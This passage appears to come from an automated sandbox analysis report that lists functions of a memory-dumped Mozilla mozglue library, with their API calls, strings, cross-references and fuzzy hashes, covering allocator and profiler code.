memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C681770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C681A3E

Strings

~qel, xrefs: 6C67ED13
~qel, xrefs: 6C67ED10

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qel$~qel
API String ID: 3693777188-2922831641
Opcode ID: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction ID: 8fa18b222c337912a8b1ca23478ce27298b3960ccb6cabc63e13a2ac82a5fafa
Opcode Fuzzy Hash: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction Fuzzy Hash: 13B33971E01219CFCB24CFA8C890ADDB7B2BF49304F2585A9D459AB745D730AD86CFA4

Function 6C66FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C670D67, 6C670D7B, 6C670DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4
<jemalloc>, xrefs: 6C670D62, 6C670D76, 6C670DA7

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction ID: e8992d00596065b3b005aafba80a9a854203beed125ea67ceae0e362e91cc08c
Opcode Fuzzy Hash: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction Fuzzy Hash: 01C20271A057418FD724CF28C590756BBE1BF85328F28CA6DE4698B7D5C732E801CBA9

Function 6C6BE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6C6BE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6BF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6C0E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6C0E54
memcpy.VCRUNTIME140(?,?,?), ref: 6C6C0EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6C6C0ED4

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: c8e1b55e4da7bfd3646139be31583bd68617d8375b9079d4d794990734b32e14
Instruction ID: 09fc73846ed4e5b5e4925d412a24fb1bb0b96869d3e965f44c9892b77a9da60c
Opcode Fuzzy Hash: c8e1b55e4da7bfd3646139be31583bd68617d8375b9079d4d794990734b32e14
Instruction Fuzzy Hash: F063AD75E0025A8FCB04CFA8C8806DDFBB2FF89304F298269D855BB755D730A946CB95

Function 6C693E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6C6B7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>il,?,?,?,6C693E7D,?,?), ref: 6C6B777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C693F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C693F5C
VerSetConditionMask.NTDLL ref: 6C693F8D
VerSetConditionMask.NTDLL ref: 6C693F99
VerSetConditionMask.NTDLL ref: 6C693FA0
VerSetConditionMask.NTDLL ref: 6C693FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C693FB4

Strings

nvd3d9wrap.dll, xrefs: 6C694466
nvinit.dll, xrefs: 6C694479
C>il, xrefs: 6C693E93

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: C>il$nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-416255230
Opcode ID: 90aaa3219a0734a8e10a1853969c769a5af7cb6c33ae41dd46dc9edeb52facce
Instruction ID: c4b7b43111936190e031cebce628acb0aecf7b3affde093ccdcb8ce31f9d9907
Opcode Fuzzy Hash: 90aaa3219a0734a8e10a1853969c769a5af7cb6c33ae41dd46dc9edeb52facce
Instruction Fuzzy Hash: 2452F531614B459FDB10DF348480ABBB7E9AF86304F04096DE5978BB82CB74F909CB68

Function 6C66FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

MOZ_CRASH(), xrefs: 6C670CA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4, 6C671A10

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 377a90b1383cd4f6e410060cebd0b236d3e52c14ea21b1dc2458dfe8be273a8a
Instruction ID: c5f8d1fd12965b830365947a9c50168999fe390861b717d07dff7eeaa7903c5c
Opcode Fuzzy Hash: 377a90b1383cd4f6e410060cebd0b236d3e52c14ea21b1dc2458dfe8be273a8a
Instruction Fuzzy Hash: 99B2FE316057418FD724CF28C5D0716BBE1BF85328F28CA6DE86A8BB95C731E840CB69

Function 6C6A5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

name, xrefs: 6C6A5E79, 6C6A5E8F
data, xrefs: 6C6A6131
ProfileBuffer parse error: %s, xrefs: 6C6A5AC8, 6C6A5CBB
expected a Count entry, xrefs: 6C6A5AC3
expected a Time entry, xrefs: 6C6A5CB6
schema, xrefs: 6C6A606D

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 76e69116b1e6e1704ffc8b5cc9e5656b803a2a136cdc7f196174341f995c3bdf
Instruction ID: 15787890fe778cc31cb661b3cbed2d527a4f8242da0139c910558a72f95608e2
Opcode Fuzzy Hash: 76e69116b1e6e1704ffc8b5cc9e5656b803a2a136cdc7f196174341f995c3bdf
Instruction Fuzzy Hash: 1F926CB1A087418FD724CF59C49079AB7E1FFC9308F14891DE59A9B751DB30E80ACB9A

Function 6C6A2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6A2ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A2EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C6A2F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A3214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A3242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A36BF

Strings

get , xrefs: 6C6A3205
set , xrefs: 6C6A36EC
MOZ_PROFILER_SYMBOLICATE, xrefs: 6C6A378D

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: 0f2f3cde56ae256f8e4f2838535945ccd874a002808d56f1c33e8a395cb1cd4e
Instruction ID: e335c5896470117f24a1d7905bca94b85fc95766e42619db47664e281dacefd1
Opcode Fuzzy Hash: 0f2f3cde56ae256f8e4f2838535945ccd874a002808d56f1c33e8a395cb1cd4e
Instruction Fuzzy Hash: 23325F706083818FD324CF64C4906AEF7E2AFCA318F54892DE59987751DB31E94ACB5B

Function 6C697E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C697ECF, 6C698335
vml, xrefs: 6C698207
data, xrefs: 6C698280, 6C6983E1
(pre-xul), xrefs: 6C697E88
schema, xrefs: 6C6981E3, 6C698311

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vml
API String ID: 3412268980-1127494330
Opcode ID: 50d35162e2be8bb4c1390a11102234f542ceebbfd6a3dbc931716a11d87444ef
Instruction ID: d705e3e16f5a66896cbab592bcc7b139a249099473c9c99f12f19ba6965382d3
Opcode Fuzzy Hash: 50d35162e2be8bb4c1390a11102234f542ceebbfd6a3dbc931716a11d87444ef
Instruction Fuzzy Hash: 95E17EB1A043418BC710CF69884065BFBE9FBC5318F154A2DE899D7790DBB0ED498B9A

Function 6C67D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D6A6
LeaveCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D712
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C67D82C
<jemalloc>, xrefs: 6C67D827

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction ID: 8e5b2784bc4e44ae93db445447a53da21b8530f242c60e12b6fd494aaa9eed1f
Opcode Fuzzy Hash: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction Fuzzy Hash: 1991C471A047018FD764CF29C49076AB7E1EB89318F158D2EE55AC7B81D734E844CBAA

Function 6C6B4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C6B4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4F2E
moz_xmalloc.MOZGLUE ref: 6C6B4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C6B4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B52E6
Sleep.KERNEL32(00000010), ref: 6C6B5481
free.MOZGLUE(?), ref: 6C6B5498

Strings

(, xrefs: 6C6B5250

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: fb8675555285ac875c3de1cb55c2b124986113e0b03f320fa3a58dae27b9f0f6
Instruction ID: 4fb74f4d0ce92a9ec60c45ee6cd4a51cd83b2aaa59eff681b535a05e015bdd44
Opcode Fuzzy Hash: fb8675555285ac875c3de1cb55c2b124986113e0b03f320fa3a58dae27b9f0f6
Instruction Fuzzy Hash: E1F1B271A19B408FC716CF39C89062BB7F5AFE6384F058B2EF846A7651DB31D4428B85

Function 6C679E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C679EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C679F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C679F34
LeaveCriticalSection.KERNEL32(?), ref: 6C67A823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67A83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67A849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C67A8B1, 6C67A8D4, 6C67A8EF

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: db17d2bc2b6b705c310f098b49b2b29c2677901b78e74add1f0f3777c2b96d9c
Instruction ID: c1827dcb3a360c7d673e696c750ffb37eae7622c7899b4964e0a10ca42f943cf
Opcode Fuzzy Hash: db17d2bc2b6b705c310f098b49b2b29c2677901b78e74add1f0f3777c2b96d9c
Instruction Fuzzy Hash: BA728D72A157118FD324CF28C540615FBE1BF89328F29CB6DE8698B792D335E841CB94

Function 6C6A2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6A2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6A2C61

Part of subcall function 6C654DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
Part of subcall function 6C654DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6A2E2D

Part of subcall function 6C6681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6681DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C6A2E3B
(root), xrefs: 6C6A354F
expected a Time entry, xrefs: 6C6A2E36

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction ID: c45b159c50666698707fa0529ec4367b72d96f9d0c3f7e5a65ee094248517380
Opcode Fuzzy Hash: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction Fuzzy Hash: 4191CF706087408FC724DF65C48469EF7E1AFCA358F10492DE99A8B751DB30E94ACB5B

Function 6C6B9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C6B9F3D
__aulldiv.LIBCMT ref: 6C6B9F77
__aullrem.LIBCMT ref: 6C6B9F8C
__aulldiv.LIBCMT ref: 6C6BA023

Strings

-Infinity, xrefs: 6C6B9E60, 6C6B9E7B
NaN, xrefs: 6C6B9EAB

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 21a65f7a866fa2667de0635a79a97d547c177c83f3e04dd9208901693037bd90
Instruction ID: cec4c0ba687317817b06540f2b3d32a47266ace032b3340d36d16366b67eb18d
Opcode Fuzzy Hash: 21a65f7a866fa2667de0635a79a97d547c177c83f3e04dd9208901693037bd90
Instruction Fuzzy Hash: FDC1DE31E043188BDB14CFA8C8907DEB7B6FF85318F544529D40ABBB81DB70A959CB99

Function 6C65D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

-, xrefs: 6C65D7DD
, xrefs: 6C65DA88
1, xrefs: 6C65DBDD
@, xrefs: 6C65DAF6
0, xrefs: 6C65D852
9, xrefs: 6C65DE7F
8, xrefs: 6C65DC08
0, xrefs: 6C65DC7F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction ID: 0aa39ac45e123d66a3a14887cae5e2a87215a2a65c9adc49dc6c57d26949dd6f
Opcode Fuzzy Hash: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction Fuzzy Hash: A262CF7060C3458FD701CF19C69079ABBF2AF86358FB84A0DE4D54BAD1C33599A5CB8A

Function 6C6C545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C8A4B

Strings

~qel, xrefs: 6C6C5703, 6C6C9459, 6C6C5740, 6C6C56C7, 6C6C9269, 6C6C921F, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 01af520261224d43aa745bc0de72f0653f0550fdd9b9ffcc5ee0159283b6d2d5
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 0BB1F772F0021A8FDB24CF68CC907E9B7B2EF85318F1802AAC549DB791D7349985CB95

Function 6C6C542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6C925C

Strings

~qel, xrefs: 6C6C5703, 6C6C9459, 6C6C5740, 6C6C56C7, 6C6C9269, 6C6C921F, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
